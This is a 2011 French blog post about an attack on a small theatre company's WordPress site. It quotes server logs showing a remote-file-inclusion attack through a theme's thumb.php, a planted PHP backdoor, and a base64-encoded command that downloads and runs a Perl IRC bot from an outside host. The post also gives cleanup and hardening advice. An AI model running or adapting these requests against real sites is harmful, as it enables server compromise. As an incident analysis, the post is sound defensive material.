Pirate du dimanche

25 septembre 2011 , , , 4 commentaires
Pour être précis, c’est le site d’un ancien client qui a été la cible  d’une attaque d’un pirate que je soupçonne d’être du dimanche car

  1. l’attaque a eu lieu  un dimanche ;
  2. mon petit pirate a laissé assez de traces pour que je puisse lui transmettre un message.

L’hébergeur du site piraté, OVH, plutôt à la pointe en matière de surveillance et d’hébergement, a eu la gentillesse de m’envoyer un mail ce matin à 10h48  m’expliquant que le site de la compagnie du théâtre du phare a été bloqué suite au déclenchement d’une opération interdite sur le serveur. Je n’ai pas de contrat de maintenance avec mon ancien client mais je ne pouvais décemment pas laisser  le site en rade – lequel avait été tout simplement été suspendu (ils sont un peu brutos chez OVH lorsqu’il est question de sécurité). Par ailleurs le hacking et la sécurité informatique étant mon nouveau terrain de jeu [1],  je me suis mis illico  à la chasse au script malicieux [2]. En plus le dimanche matin, je vais pas  à la messe,  alors j’ai un peu de temps.

La base pour une opération de piratage réussie, c’est de ne pas laisser de traces. J’ai donc espéré que mon pirate du dimanche n’ait pas été si bon que ça et je suis allé voir directement dans les logs de mon serveur [3]. L’alerte sécurité ayant été déclenchée à 10h48 j’ai commencé à étudier les logs à partir de cette heure là. Bien m’en a pris puisque à 10h47 voici ce qui s’est passé :

000.000.00.00 theatreduphare.fr - [25/Sep/2011:10:47:48 +0200] "GET /wp-content/themes/canvas/thumb.php?src=http://grosnazetalaisseladressedetonsite.com/yahoo.php HTTP/1.1" 200 831 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
000.000.00.00 theatreduphare.fr - [25/Sep/2011:10:47:51 +0200] "GET /category/wp-content/themes/canvas/thumb.php?src=http://grosnazetalaisseladressedetonsite.com/yahoo.php HTTP/1.1" 404 28205 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
000.000.00.00 theatreduphare.fr - [25/Sep/2011:10:47:44 +0200] "GET /category/spectacles-en-tournee/wp-content/themes/canvas/thumb.php?src=http://grosnazetalaisseladressedetonsite.com/yahoo.php HTTP/1.1" 404 28205 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
000.000.00.00 theatreduphare.fr - [25/Sep/2011:10:47:48 +0200] "GET /wp-content/themes/canvas/cache/external_ffe37f6533095659017bd96829adf796.php?lol HTTP/1.1" 200 173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
000.000.00.00 theatreduphare.fr - [25/Sep/2011:10:47:52 +0200] "GET /wp-content/themes/canvas/cache/external_ffe37f6533095659017bd96829adf796.php?osc=d2dldCBodHRwOi8vd3d3LnZpcnR1ZW1hcnRzaG9wcGluZ2dyb3Vwcy5jb20vZGVtb3NpdGUvbG9n%0Acy9mYXNoaW9ucy5qcGcgLU8gbmFrYWwudHh0O3BlcmwgbmFrYWwudHh0IGlyYy5ub2IwZHkubmV0%0AIDU0MzIxIHRpbWJvdCB0aW0gY2FzdWFsIGFKZSAvdXNyL3NiaW4vaHR0cGQ= HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Détail intéressant, le script thumb.php dans le dossier /wp-content/themes/canvas/ a été appelé avec des paramètres inhabituels par un ordinateur dont l’adresse IP est 000.000.00.00 [4]. Je constate que cette même machine a interrogé d’autres pages qui ne sont pas censées être accessible au public. Bingo, je tiens mon pirate. Je vais chercher les pages en question et il s’avère que ce sont les scripts qui ont déclenché le blocage du serveur (c’est plus compliqué que ça, mais je ne vais pas rentrer dans les détails). Dans le fichier log, je constate également que mon ami le pirate du dimanche a laissé en plus de son adresse IP, ce qui n’est déjà pas très malin, l’adresse d’un script appelé à partir de mon serveur, ce qui est encore moins malin. Je vais pouvoir remonter jusqu’à lui et j ne vais pas m’en priver.

Après avoir dégagé les scripts malicieux du serveur, il faut fermer la porte par laquelle est entré le pirate. Là, c’est un peu plus compliqué. Première mesure : mettre à jour les modules utilisés sur le site.  Si c’est un CMS, mettez-le  à jour, si votre CMS utilise des thèmes ou des plugins, mettez-les à jour, si vous utilisez des bibliothèques spécifiques, mettez-les à jour. Bref, mettez tout  à jour. Une fois ceci fait, vous pouvez regarder la date de création du script malicieux et remonter dans vos logs au jour de la création du fichier et essayer de déceler quelque chose d’inhabituel. En plus des logs apache, il est de bon ton de regarder les logs et l’historique des commandes de votre serveur unix – si vous y avez accès. Enfin, afin d’éviter que ça ne se reproduise, ou si vous souhaitez jouer un peu avec votre pirate du dimanche et rendre ses intrusions plus difficiles, vous pouvez également mettre en place un pare-feu devant votre site, tel que mod_security par exemple.

J’ai passé une matinée à sécuriser à nouveau theatreduphare.fr et à jouer avec les traces de mon pirate pour finalement trouver qu’il avait laissé derrière lui son adresse et son porte-feuille. Je pense petit pirate que si tu continues comme ça, il risque de t’arriver des bricoles, genre la maréchaussée qui débarque chez toi pour te demander deux  ou trois petits renseignements. Je ne saurais donc trop te conseiller la lecture de ce texte, écrit par un grand : comment effacer ses traces. C’est trop bête d’aller en prison quand on a à peine 14 ans. Par ailleurs, comme je ne suis pas un salaud et vu que que tu ne ne m’a pas causé de problème plus important que l’indisponibilité d’un site pendant 20 minutes et un dimanche matin passé à ne pas regarder la messe sur France2, j’ai changé les informations permettant de remonter jusqu’à toi, à savoir ton adresse IP et l’adresse de ta hacking team. Je t’ai quand même laissé un message sur ton forum pour te faire part de l’existence de ce billet sur ton petit exploit. J’espère que tu me feras un beau backlink et que tu réfléchiras un peu plus la prochaine fois avant de t’introduire dans un serveur, surtout quand c’est mon serveur. Je te salue bien bas petit pirate du dimanche.

  1. J’ai changé de travail. Je suis toujours chez RSF, mais je m’occupe moins des sites web et plus de problèmes liés à la cybercensure. J’aurais l’occasion de revenir là-dessus de manière anecdotique lors de la publication de prochains billets qui s’annoncent tout simplement passionnants. Teasing.
  2. C’est toujours moins inutile qu’une chasse à cour. En plus le dimanche matin, y’a que du foot ou des curés  à la télé.
  3. Toute l’activité d’un site web, les pages consultées, par qui et à quelle heure, tout ceci est enregistré dans un fichier texte appelé log
  4. C’est pas parce que tu es nul qu’il faut en plus que tu te tapes l’affiche. Dans ce bout de log, j’ai remplacé l’adresse IP de mon pirate  par 000.000.00.00 l’adresse de son site par http://grosnazetalaisseladressedetonsite.com.

Réagissez

Si ce billet vous a plu ou si vous voulez apporter des précisions, ou si vous n’êtes pas d’accord avec ce que je raconte, c’est ici qu’il faut vous manifester. Je me réserve toutefois le droit de supprimer toute contribution insultante ou qui n’aurait rien à voir avec la choucroute.

  1. Olivier Delcroix

    Pour info, OVH (le FAI de Roubaix), s’est fait lui-même HACKER en 2003 !!!! A éviter d’ urgence, ils sont nuls et dangereux !!!!

  2. Grégoire

    Olivier, OVH reste l’un des hébergeurs les plus compétents de France voire d’Europe. Wikileaks a choisi OVH par exemple pour sa solidité technique. Par ailleurs, aucun hébergeur n’est inviolable. C’est juste une question de temps et de moyen.

  3. FCB

    Olivier Delcroix, le mec qui vit dans l’Internet de 2003.

  4. Arthur

    OVH est quand même en ce moment le leader dans la sécurité pour ces serveurs.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.